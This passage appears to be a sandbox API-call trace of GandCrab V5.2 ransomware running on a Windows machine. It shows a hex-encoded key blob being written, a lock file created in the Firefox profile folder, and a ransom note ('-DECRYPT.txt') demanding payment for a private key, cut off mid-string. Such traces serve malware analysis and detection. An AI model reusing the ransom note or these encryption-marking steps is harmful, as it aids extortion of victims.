d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.893] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0079.894] CloseHandle (hObject=0x2bc) returned 1 [0079.894] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.894] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.894] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0xca)) [0079.894] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.895] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.895] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.895] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a09d2ca4deb61a.lock") returned 78 [0079.895] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0079.897] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.897] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.897] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 54 [0079.897] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*" [0079.897] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503478 [0079.897] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.897] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.897] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.897] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.897] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.897] lstrcmpW (lpString1="Crash Reports", lpString2=".") returned 1 [0079.897] lstrcmpW (lpString1="Crash Reports", lpString2="..") returned 1 [0079.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Crash Reports" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0079.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0079.898] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.898] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.898] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.898] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.899] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.899] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.899] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.899] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\TITWMVJL-DECRYPT.txt") returned 89 [0079.899] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0079.900] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x2